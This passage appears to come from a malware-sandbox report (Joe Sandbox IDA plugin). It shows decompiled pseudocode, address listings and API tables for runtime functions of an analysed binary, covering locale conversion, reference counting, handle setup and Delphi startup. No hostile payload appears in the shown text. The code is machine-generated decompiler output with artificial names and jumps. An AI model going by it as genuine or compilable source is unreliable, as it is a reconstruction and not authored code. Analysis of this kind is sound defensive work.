									goto L45;
								}
								 *_t112 = 0xcccc;
								_t112 = _t112 + 8;
								goto L38;
							}
							_t86 = _a28;
							__eflags = _t86;
							if(_t86 != 0) {
								__eflags = _v12 - _t86;
								if(_v12 <= _t86) {
									LCMapStringW(_a8, _a12, _v16, _t112, _a24, _t86);
								}
							}
							goto L45;
						}
						_t88 = 0xffffffe0;
						_t109 = _t88 % _t112;
						__eflags = _t88 / _t112 - 2;
						if(_t88 / _t112 < 2) {
							goto L21;
						}
						_t24 = _t112 + 8; // 0x8
						_t90 = _t112 + _t24;
						__eflags = _t90 - 0x400;
						if(_t90 > 0x400) {
							_t91 = E030089C5(_t109, _t112, MultiByteToWideChar, _t90);
							__eflags = _t91;
							if(_t91 == 0) {
								L20:
								_v16 = _t91;
								goto L22;
							}
							 *_t91 = 0xdddd;
							L19:
							_t91 =  &(_t91[4]);
							__eflags = _t91;
							goto L20;
						}
						E03009200(_t90);
						_t91 = _t116;
						__eflags = _t91;
						if(_t91 == 0) {
							goto L20;
						}
						 *_t91 = 0xcccc;
						goto L19;
					} else {
						L11:
						_t73 = 0;
						L46:
						return E03006BA0(_t73, 0, _v8 ^ _t115, _t109, _t112, _t114);
					}
				} else {
					_t96 = _a16;
					_t108 = _t109;
					while(1) {
						_t108 = _t108 - 1;
						if( *_t96 == 0) {
							break;
						}
						_t96 =  &(_t96[1]);
						if(_t108 != 0) {
							continue;
						} else {
							_t108 = _t108 | 0xffffffff;
							break;
						}
					}
					_t99 = _t109 - _t108 - 1;
					if(_t99 < _t109) {
						_t99 = _t99 + 1;
					}
					_a20 = _t99;
					goto L8;
				}
			}































    0x03008192
    0x03008199
    0x0300819c
    0x030081a6
    0x030081c7
    0x030081c7
    0x030081cd
    0x030081d7
    0x030081d7
    0x030081da
    0x030081fd
    0x030081ff
    0x03008204
    0x0300820d
    0x03008252
    0x03008252
    0x03008255
    0x03008255
    0x03008258
    0x00000000
    0x00000000
    0x03008269
    0x0300826b
    0x0300826d
    0x03008353
    0x03008356
    0x0300835b
    0x00000000
    0x0300835e
    0x03008273
    0x03008285
    0x03008287
    0x0300828a
    0x0300828c
    0x00000000
    0x00000000
    0x03008297
    0x0300829a
    0x030082c5
    0x030082c8
    0x030082ca
    0x0300830e
    0x0300830e
    0x0300830e
    0x03008310
    0x03008310
    0x03008312
    0x03008324
    0x03008326
    0x03008328
    0x0300832a
    0x0300832b
    0x0300832c
    0x0300832f
    0x03008335
    0x03008338
    0x03008331
    0x03008331
    0x03008332
    0x03008332
    0x03008349
    0x03008349
    0x0300834d
    0x03008352
    0x00000000
    0x03008312
    0x030082d0
    0x030082d1
    0x030082d3
    0x030082d6
    0x00000000
    0x00000000
    0x030082d8
    0x030082dc
    0x030082de
    0x030082f7
    0x030082fd
    0x030082ff
    0x03008301
    0x03008307
    0x03008307
    0x03008307
    0x0300830a
    0x00000000
    0x0300830a
    0x030082e0
    0x030082e5
    0x030082e7
    0x030082e9
    0x00000000
    0x00000000
    0x030082eb
    0x030082f1
    0x00000000
    0x030082f1
    0x0300829c
    0x0300829f
    0x030082a1
    0x030082a7
    0x030082aa
    0x030082be
    0x030082be
    0x030082aa
    0x00000000
    0x030082a1
    0x03008213
    0x03008214
    0x03008216
    0x03008219
    0x00000000
    0x00000000
    0x0300821b
    0x0300821b
    0x0300821f
    0x03008224
    0x0300823a
    0x03008240
    0x03008242
    0x0300824d
    0x0300824d
    0x00000000
    0x0300824d
    0x03008244
    0x0300824a
    0x0300824a
    0x0300824a
    0x00000000
    0x0300824a
    0x03008226
    0x0300822b
    0x0300822d
    0x0300822f
    0x00000000
    0x00000000
    0x03008231
    0x00000000
    0x03008206
    0x03008206
    0x03008206
    0x0300835f
    0x03008370
    0x03008370
    0x030081a8
    0x030081a8
    0x030081ab
    0x030081ad
    0x030081ad
    0x030081b0
    0x00000000
    0x00000000
    0x030081b2
    0x030081b5
    0x00000000
    0x030081b7
    0x030081b7
    0x00000000
    0x030081b7
    0x030081b5
    0x030081be
    0x030081c1
    0x030081c3
    0x030081c3
    0x030081c4
    0x00000000
    0x030081c4

    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,?,?,?,00000000), ref: 030081FB
    • MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,?,00000000,?,00000000,?,?,?,?,?,00000000), ref: 03008269
    • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,?,?,?,?,?,00000000), ref: 03008285
    • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,00000000,?,?,?,?,?,00000000), ref: 030082BE
      • Part of subcall function 030089C5: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,030068FF,?,00000001,?,?,03006E19,00000018,03009958,0000000C,03006EA9), ref: 03008A0A
    • LCMapStringW.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,?,?,?,?,00000000), ref: 03008324
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,?,00000000), ref: 03008343
    • __freea.LIBCMT ref: 0300834D
    • __freea.LIBCMT ref: 03008356
      • Part of subcall function 03006BA0: IsDebuggerPresent.KERNEL32 ref: 03008C43
      • Part of subcall function 03006BA0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03008C58
      • Part of subcall function 03006BA0: UnhandledExceptionFilter.KERNEL32(03002930), ref: 03008C63
      • Part of subcall function 03006BA0: GetCurrentProcess.KERNEL32(C0000409), ref: 03008C7F
      • Part of subcall function 03006BA0: TerminateProcess.KERNEL32(00000000), ref: 03008C86
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    Function 030065E7, Relevance: 12.1, APIs: 8, Instructions: 61
    C-Code - Quality: 100%
    			E030065E7(LONG* _a4) {
				LONG* _t16;
				LONG* _t17;
				LONG* _t18;
				LONG* _t19;
				LONG* _t20;
				LONG* _t21;
				long* _t32;
				LONG* _t34;

				_t34 = _a4;
				if(_t34 == 0) {
					L18:
					return _t34;
				}
				InterlockedDecrement(_t34);
				_t16 = _t34[0x2c];
				if(_t16 != 0) {
					InterlockedDecrement(_t16);
				}
				_t17 = _t34[0x2e];
				if(_t17 != 0) {
					InterlockedDecrement(_t17);
				}
				_t18 = _t34[0x2d];
				if(_t18 != 0) {
					InterlockedDecrement(_t18);
				}
				_t19 = _t34[0x30];
				if(_t19 != 0) {
					InterlockedDecrement(_t19);
				}
				_t32 =  &(_t34[0x14]);
				_a4 = 6;
				do {
					if( *((intOrPtr*)(_t32 - 8)) != 0x300b974) {
						_t20 =  *_t32;
						if(_t20 != 0) {
							InterlockedDecrement(_t20);
						}
					}
					if( *((intOrPtr*)(_t32 - 4)) != 0) {
						_t21 = _t32[1];
						if(_t21 != 0) {
							InterlockedDecrement(_t21);
						}
					}
					_t32 =  &(_t32[4]);
					_t11 =  &_a4;
					 *_t11 = _a4 - 1;
				} while ( *_t11 != 0);
				InterlockedDecrement(_t34[0x35] + 0xb4);
				goto L18;
			}











    0x030065ed
    0x030065f2
    0x0300667b
    0x0300667f
    0x0300667f
    0x03006601
    0x03006603
    0x0300660b
    0x0300660e
    0x0300660e
    0x03006610
    0x03006618
    0x0300661b
    0x0300661b
    0x0300661d
    0x03006625
    0x03006628
    0x03006628
    0x0300662a
    0x03006632
    0x03006635
    0x03006635
    0x03006637
    0x0300663a
    0x03006641
    0x03006648
    0x0300664a
    0x0300664e
    0x03006651
    0x03006651
    0x0300664e
    0x03006657
    0x03006659
    0x0300665e
    0x03006661
    0x03006661
    0x0300665e
    0x03006663
    0x03006666
    0x03006666
    0x03006666
    0x03006677
    0x00000000

    APIs
    • InterlockedDecrement.KERNEL32(?), ref: 03006601
    • InterlockedDecrement.KERNEL32(?), ref: 0300660E
    • InterlockedDecrement.KERNEL32(?), ref: 0300661B
    • InterlockedDecrement.KERNEL32(?), ref: 03006628
    • InterlockedDecrement.KERNEL32(?), ref: 03006635
    • InterlockedDecrement.KERNEL32(?), ref: 03006651
    • InterlockedDecrement.KERNEL32(00000000), ref: 03006661
    • InterlockedDecrement.KERNEL32(?), ref: 03006677
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    Function 03006558, Relevance: 12.1, APIs: 8, Instructions: 58
    C-Code - Quality: 100%
    			E03006558(LONG* _a4) {
				LONG* _t15;
				LONG* _t16;
				LONG* _t17;
				LONG* _t18;
				LONG* _t19;
				LONG* _t20;
				long* _t30;
				LONG* _t31;

				_t31 = _a4;
				InterlockedIncrement(_t31);
				_t15 = _t31[0x2c];
				if(_t15 != 0) {
					InterlockedIncrement(_t15);
				}
				_t16 = _t31[0x2e];
				if(_t16 != 0) {
					InterlockedIncrement(_t16);
				}
				_t17 = _t31[0x2d];
				if(_t17 != 0) {
					InterlockedIncrement(_t17);
				}
				_t18 = _t31[0x30];
				if(_t18 != 0) {
					InterlockedIncrement(_t18);
				}
				_t30 =  &(_t31[0x14]);
				_a4 = 6;
				do {
					if( *((intOrPtr*)(_t30 - 8)) != 0x300b974) {
						_t19 =  *_t30;
						if(_t19 != 0) {
							InterlockedIncrement(_t19);
						}
					}
					if( *((intOrPtr*)(_t30 - 4)) != 0) {
						_t20 = _t30[1];
						if(_t20 != 0) {
							InterlockedIncrement(_t20);
						}
					}
					_t30 =  &(_t30[4]);
					_t11 =  &_a4;
					 *_t11 = _a4 - 1;
				} while ( *_t11 != 0);
				return InterlockedIncrement(_t31[0x35] + 0xb4);
			}











    0x03006566
    0x0300656a
    0x0300656c
    0x03006574
    0x03006577
    0x03006577
    0x03006579
    0x03006581
    0x03006584
    0x03006584
    0x03006586
    0x0300658e
    0x03006591
    0x03006591
    0x03006593
    0x0300659b
    0x0300659e
    0x0300659e
    0x030065a0
    0x030065a3
    0x030065aa
    0x030065b1
    0x030065b3
    0x030065b7
    0x030065ba
    0x030065ba
    0x030065b7
    0x030065c0
    0x030065c2
    0x030065c7
    0x030065ca
    0x030065ca
    0x030065c7
    0x030065cc
    0x030065cf
    0x030065cf
    0x030065cf
    0x030065e6

    APIs
    • InterlockedIncrement.KERNEL32(?), ref: 0300656A
    • InterlockedIncrement.KERNEL32(?), ref: 03006577
    • InterlockedIncrement.KERNEL32(?), ref: 03006584
    • InterlockedIncrement.KERNEL32(?), ref: 03006591
    • InterlockedIncrement.KERNEL32(?), ref: 0300659E
    • InterlockedIncrement.KERNEL32(?), ref: 030065BA
    • InterlockedIncrement.KERNEL32(00000000), ref: 030065CA
    • InterlockedIncrement.KERNEL32(?), ref: 030065E0
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    Function 030048FF, Relevance: 10.7, APIs: 7, Instructions: 196
    C-Code - Quality: 78%
    			E030048FF() {
				intOrPtr* _v8;
				void** _v12;
				struct _STARTUPINFOW _v80;
				signed int _t61;
				void* _t62;
				long _t65;
				signed int _t68;
				signed int _t69;
				signed int _t70;
				int _t72;
				signed int _t73;
				intOrPtr* _t74;
				void* _t77;
				long _t85;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t91;
				int _t93;
				signed char _t98;
				void* _t108;
				signed int _t110;
				signed int* _t111;
				int _t112;
				void** _t115;
				void** _t120;
				signed int _t121;

				GetStartupInfoW( &_v80);
				_push(0x40);
				_t112 = 0x20;
				_push(_t112);
				_t61 = E03006933();
				if(_t61 != 0) {
					_t2 = _t61 + 0x800; // 0x800
					 *0x3012f80 = _t61;
					 *0x3012f68 = _t112;
					__eflags = _t61 - _t2;
					if(_t61 >= _t2) {
						L5:
						__eflags = _v80.cbReserved2;
						if(_v80.cbReserved2 == 0) {
							L27:
							_t91 = 0;
							__eflags = 0;
							do {
								_t115 = (_t91 << 6) +  *0x3012f80;
								_t62 =  *_t115;
								__eflags = _t62 - 0xffffffff;
								if(_t62 == 0xffffffff) {
									L31:
									_t115[1] = 0x81;
									__eflags = _t91;
									if(_t91 != 0) {
										_t50 = _t91 - 1; // -1
										asm("sbb eax, eax");
										_t65 =  ~_t50 + 0xfffffff5;
										__eflags = _t65;
									} else {
										_t65 = 0xfffffff6;
									}
									_t108 = GetStdHandle(_t65);
									__eflags = _t108 - 0xffffffff;
									if(_t108 == 0xffffffff) {
										L43:
										_t58 =  &(_t115[1]);
										 *_t58 = _t115[1] | 0x00000040;
										__eflags =  *_t58;
										 *_t115 = 0xfffffffe;
										goto L44;
									} else {
										__eflags = _t108;
										if(_t108 == 0) {
											goto L43;
										}
										_t69 = GetFileType(_t108);
										__eflags = _t69;
										if(_t69 == 0) {
											goto L43;
										}
										_t70 = _t69 & 0x000000ff;
										 *_t115 = _t108;
										__eflags = _t70 - 2;
										if(_t70 != 2) {
											__eflags = _t70 - 3;
											if(_t70 == 3) {
												_t53 =  &(_t115[1]);
												 *_t53 = _t115[1] | 0x00000008;
												__eflags =  *_t53;
											}
										} else {
											_t115[1] = _t115[1] | 0x00000040;
										}
										_t55 =  &(_t115[3]); // -50409332
										_t72 = InitializeCriticalSectionAndSpinCount(_t55, 0xfa0);
										__eflags = _t72;
										if(_t72 == 0) {
											L48:
											_t68 = _t72 | 0xffffffff;
											L46:
											return _t68;
										} else {
											_t115[2] = _t115[2] + 1;
											goto L44;
										}
									}
								}
								__eflags = _t62 - 0xfffffffe;
								if(_t62 == 0xfffffffe) {
									goto L31;
								}
								_t115[1] = _t115[1] | 0x00000080;
								L44:
								_t91 = _t91 + 1;
								__eflags = _t91 - 3;
							} while (_t91 < 3);
							SetHandleCount( *0x3012f68);
							_t68 = 0;
							__eflags = 0;
							goto L46;
						}
						_t73 = _v80.lpReserved2;
						__eflags = _t73;
						if(_t73 == 0) {
							goto L27;
						}
						_t93 =  *_t73;
						_t74 = _t73 + 4;
						_v8 = _t74;
						_v12 = _t74 + _t93;
						__eflags = _t93 - 0x800;
						if(_t93 >= 0x800) {
							_t93 = 0x800;
						}
						__eflags =  *0x3012f68 - _t93; // 0x0
						if(__eflags >= 0) {
							L18:
							_t110 = 0;
							__eflags = _t93;
							if(_t93 <= 0) {
								goto L27;
							} else {
								goto L19;
							}
							do {
								L19:
								_t77 =  *_v12;
								__eflags = _t77 - 0xffffffff;
								if(_t77 == 0xffffffff) {
									goto L26;
								}
								__eflags = _t77 - 0xfffffffe;
								if(_t77 == 0xfffffffe) {
									goto L26;
								}
								_t98 =  *_v8;
								__eflags = _t98 & 0x00000001;
								if((_t98 & 0x00000001) == 0) {
									goto L26;
								}
								__eflags = _t98 & 0x00000008;
								if((_t98 & 0x00000008) != 0) {
									L24:
									_t120 = ((_t110 & 0x0000001f) << 6) + 0x3012f80[_t110 >> 5];
									 *_t120 =  *_v12;
									_t120[1] =  *_v8;
									_t40 =  &(_t120[3]); // 0xc
									_t72 = InitializeCriticalSectionAndSpinCount(_t40, 0xfa0);
									__eflags = _t72;
									if(_t72 == 0) {
										goto L48;
									}
									_t41 =  &(_t120[2]);
									 *_t41 = _t120[2] + 1;
									__eflags =  *_t41;
									goto L26;
								}
								_t85 = GetFileType(_t77);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L26;
								}
								goto L24;
								L26:
								_v12 =  &(_v12[1]);
								_t110 = _t110 + 1;
								_v8 = _v8 + 1;
								__eflags = _t110 - _t93;
							} while (_t110 < _t93);
							goto L27;
						} else {
							_t111 = 0x3012f84;
							while(1) {
								_t86 = E03006933(0x20, 0x40);
								__eflags = _t86;
								if(_t86 == 0) {
									break;
								}
								 *0x3012f68 =  *0x3012f68 + 0x20;
								_t16 = _t86 + 0x800; // 0x800
								 *_t111 = _t86;
								__eflags = _t86 - _t16;
								if(_t86 >= _t16) {
									L15:
									_t111 =  &(_t111[1]);
									__eflags =  *0x3012f68 - _t93; // 0x0
									if(__eflags < 0) {
										continue;
									}
									goto L18;
								}
								_t87 = _t86 + 5;
								__eflags = _t87;
								do {
									 *(_t87 - 5) =  *(_t87 - 5) | 0xffffffff;
									 *(_t87 + 3) =  *(_t87 + 3) & 0x00000000;
									 *(_t87 + 0x1f) =  *(_t87 + 0x1f) & 0x00000080;
									 *(_t87 + 0x33) =  *(_t87 + 0x33) & 0x00000000;
									 *((short*)(_t87 - 1)) = 0xa00;
									 *((short*)(_t87 + 0x20)) = 0xa0a;
									 *((char*)(_t87 + 0x2f)) = 0;
									_t87 = _t87 + 0x40;
									_t28 = _t87 - 5; // -74
									__eflags = _t28 -  *_t111 + 0x800;
								} while (_t28 <  *_t111 + 0x800);
								goto L15;
							}
							_t93 =  *0x3012f68; // 0x0
							goto L18;
						}
					}
					_t88 = _t61 + 5;
					__eflags = _t88;
					do {
						 *(_t88 - 5) =  *(_t88 - 5) | 0xffffffff;
						 *((short*)(_t88 - 1)) = 0xa00;
						 *((intOrPtr*)(_t88 + 3)) = 0;
						 *((short*)(_t88 + 0x1f)) = 0xa00;
						 *((char*)(_t88 + 0x21)) = 0xa;
						 *((intOrPtr*)(_t88 + 0x33)) = 0;
						 *((char*)(_t88 + 0x2f)) = 0;
						_t121 =  *0x3012f80; // 0x0
						_t88 = _t88 + 0x40;
						_t11 = _t88 - 5; // -74
						__eflags = _t11 - _t121 + 0x800;
					} while (_t11 < _t121 + 0x800);
					goto L5;
				}
				return _t61 | 0xffffffff;
			}






























    0x0300490c
    0x03004912
    0x03004916
    0x03004917
    0x03004918
    0x03004923
    0x0300492d
    0x03004933
    0x03004938
    0x0300493e
    0x03004940
    0x03004978
    0x0300497a
    0x0300497e
    0x03004a92
    0x03004a92
    0x03004a92
    0x03004a94
    0x03004a99
    0x03004a9f
    0x03004aa1
    0x03004aa4
    0x03004ab1
    0x03004ab1
    0x03004ab5
    0x03004ab7
    0x03004abe
    0x03004ac3
    0x03004ac5
    0x03004ac5
    0x03004ab9
    0x03004abb
    0x03004abb
    0x03004acf
    0x03004ad1
    0x03004ad4
    0x03004b18
    0x03004b18
    0x03004b18
    0x03004b18
    0x03004b1c
    0x00000000
    0x03004ad6
    0x03004ad6
    0x03004ad8
    0x00000000
    0x00000000
    0x03004adb
    0x03004ae1
    0x03004ae3
    0x00000000
    0x00000000
    0x03004ae5
    0x03004aea
    0x03004aec
    0x03004aef
    0x03004af7
    0x03004afa
    0x03004afc
    0x03004afc
    0x03004afc
    0x03004afc
    0x03004af1
    0x03004af1
    0x03004af1
    0x03004b05
    0x03004b09
    0x03004b0f
    0x03004b11
    0x03004b3f
    0x03004b3f
    0x03004b3a
    0x00000000
    0x03004b13
    0x03004b13
    0x00000000
    0x03004b13
    0x03004b11
    0x03004ad4
    0x03004aa6
    0x03004aa9
    0x00000000
    0x00000000
    0x03004aab
    0x03004b22
    0x03004b22
    0x03004b23
    0x03004b23
    0x03004b32
    0x03004b38
    0x03004b38
    0x00000000
    0x03004b38
    0x03004984
    0x03004987
    0x03004989
    0x00000000
    0x00000000
    0x0300498f
    0x03004991
    0x03004994
    0x0300499e
    0x030049a1
    0x030049a3
    0x030049a5
    0x030049a5
    0x030049a7
    0x030049ad
    0x03004a1a
    0x03004a1a
    0x03004a1c
    0x03004a1e
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x03004a20
    0x03004a20
    0x03004a23
    0x03004a25
    0x03004a28
    0x00000000
    0x00000000
    0x03004a2a
    0x03004a2d
    0x00000000
    0x00000000
    0x03004a32
    0x03004a34
    0x03004a37
    0x00000000
    0x00000000
    0x03004a39
    0x03004a3c
    0x03004a49
    0x03004a56
    0x03004a62
    0x03004a69
    0x03004a71
    0x03004a75
    0x03004a7b
    0x03004a7d
    0x00000000
    0x00000000
    0x03004a83
    0x03004a83
    0x03004a83
    0x00000000
    0x03004a83
    0x03004a3f
    0x03004a45
    0x03004a47
    0x00000000
    0x00000000
    0x00000000
    0x03004a86
    0x03004a86
    0x03004a8a
    0x03004a8b
    0x03004a8e
    0x03004a8e
    0x00000000
    0x030049af
    0x030049af
    0x030049b4
    0x030049b8
    0x030049bf
    0x030049c1
    0x00000000
    0x00000000
    0x030049c3
    0x030049ca
    0x030049d0
    0x030049d2
    0x030049d4
    0x03004a07
    0x03004a07
    0x03004a0a
    0x03004a10
    0x00000000
    0x00000000
    0x00000000
    0x03004a12
    0x030049d6
    0x030049d6
    0x030049d9
    0x030049d9
    0x030049dd
    0x030049e1
    0x030049e5
    0x030049e9
    0x030049ef
    0x030049f5
    0x030049fb
    0x03004a00
    0x03004a03
    0x03004a03
    0x00000000
    0x030049d9
    0x03004a14
    0x00000000
    0x03004a14
    0x030049ad
    0x03004942
    0x03004942
    0x03004945
    0x03004945
    0x03004949
    0x0300494f
    0x03004952
    0x03004958
    0x0300495c
    0x0300495f
    0x03004962
    0x03004968
    0x0300496b
    0x03004974
    0x03004974
    0x00000000
    0x03004945
    0x00000000

    APIs
    • GetStartupInfoW.KERNEL32(?), ref: 0300490C
      • Part of subcall function 03006933: Sleep.KERNEL32(00000000,03002BF3), ref: 0300695B
    • GetFileType.KERNEL32(?), ref: 03004A3F
    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 03004A75
    • GetStdHandle.KERNEL32(-000000F6), ref: 03004AC9
    • GetFileType.KERNEL32(00000000), ref: 03004ADB
    • InitializeCriticalSectionAndSpinCount.KERNEL32(-03012F74,00000FA0), ref: 03004B09
    • SetHandleCount.KERNEL32 ref: 03004B32
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    Function 0040B9A0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41
    C-Code - Quality: 100%
    			E0040B9A0() {
				struct HINSTANCE__** _t2;
				void* _t3;
				struct HINSTANCE__** _t5;
				struct HRSRC__* _t7;
				struct HINSTANCE__** _t8;
				intOrPtr* _t11;
				intOrPtr* _t12;
				struct HINSTANCE__* _t13;

				_t2 =  *0x452f9c; // 0x45402c
				if( *_t2 != 0) {
					_t5 =  *0x452f9c; // 0x45402c
					_t7 = FindResourceA( *_t5, "DVCLAL", 0xa);
					_t8 =  *0x452f9c; // 0x45402c
					return LoadResource( *_t8, _t7);
				}
				_t3 = 0;
				_t11 =  *0x4530b8; // 0x419034
				_t12 =  *_t11;
				if(_t12 != 0) {
					while(1) {
						_t13 =  *(_t12 + 4);
						_t3 = LoadResource(_t13, FindResourceA(_t13, "DVCLAL", 0xa));
						if(_t3 != 0) {
							goto L5;
						}
						_t12 =  *_t12;
						if(_t12 != 0) {
							continue;
						}
						goto L5;
					}
				}
				L5:
				return _t3;
			}











    0x0040b9a3
    0x0040b9ab
    0x0040b9b4
    0x0040b9bc
    0x0040b9c2
    0x00000000
    0x0040b9ca
    0x0040b9d1
    0x0040b9d3
    0x0040b9d9
    0x0040b9dd
    0x0040b9df
    0x0040b9e8
    0x0040b9f3
    0x0040b9fa
    0x00000000
    0x00000000
    0x0040b9fc
    0x0040ba00
    0x00000000
    0x00000000
    0x00000000
    0x0040ba00
    0x0040b9df
    0x0040ba05
    0x0040ba05

    APIs
    • FindResourceA.KERNEL32(00400000,DVCLAL,0000000A), ref: 0040B9BC
    • LoadResource.KERNEL32(00400000,00000000,00400000,DVCLAL,0000000A,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3), ref: 0040B9CA
    • FindResourceA.KERNEL32(?,DVCLAL,0000000A), ref: 0040B9EC
    • LoadResource.KERNEL32(?,00000000,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3,00416F00,00000000,00417553), ref: 0040B9F3
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 00405945, Relevance: 9.0, APIs: 6, Instructions: 41
    C-Code - Quality: 100%
    			E00405945(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x4545b4)) =  *((intOrPtr*)(__eax - 0x4545b4)) + __eax - 0x4545b4;
				 *0x419008 = 2;
				 *0x454014 = 0x4011a8;
				 *0x454018 = 0x4011b0;
				 *0x454046 = 2;
				 *0x454000 = E00404B04;
				if(E00402F5C() != 0) {
					_t3 = E00402F8C();
				}
				E00403050(_t3);
				 *0x45404c = 0xd7b0;
				 *0x454218 = 0xd7b0;
				 *0x4543e4 = 0xd7b0;
				 *0x45403c = GetCommandLineA();
				 *0x454038 = E004012C0();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x4545b8 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x454030 = _t11;
				return _t11;
			}





    0x00405945
    0x0040594a
    0x0040594f
    0x00405951
    0x00405958
    0x00405962
    0x0040596c
    0x00405973
    0x00405984
    0x00405986
    0x00405986
    0x0040598b
    0x00405990
    0x00405999
    0x004059a2
    0x004059b0
    0x004059ba
    0x004059ce
    0x00405a07
    0x004059d0
    0x004059de
    0x004059f6
    0x004059e0
    0x004059e0
    0x004059e0
    0x004059de
    0x00405a0c
    0x00405a11
    0x00405a16

    APIs
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000000), ref: 00402F61
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000001), ref: 00402F6D
    • GetCommandLineA.KERNEL32 ref: 004059AB
      • Part of subcall function 004012C0: GetStartupInfoA.KERNEL32 ref: 004012CA
    • GetVersion.KERNEL32 ref: 004059BF
    • GetVersion.KERNEL32 ref: 004059D0
    • GetThreadLocale.KERNEL32 ref: 004059EC
    • GetThreadLocale.KERNEL32 ref: 004059FD
      • Part of subcall function 0040587C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    • GetCurrentThreadId.KERNEL32 ref: 00405A0C
      • Part of subcall function 00402F8C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
      • Part of subcall function 00402F8C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
      • Part of subcall function 00402F8C: RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 0040A980, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 107
    C-Code - Quality: 86%
    			E0040A980(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				char _v297;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				void* _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				char _v372;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v372 = 0;
				_v336 = 0;
				_v344 = 0;
				_v340 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0x40ab3b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffe90;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x453064; // 0x405f58
					E00405824(_t52,  &_v8);
				} else {
					_t86 =  *0x453120; // 0x405f50
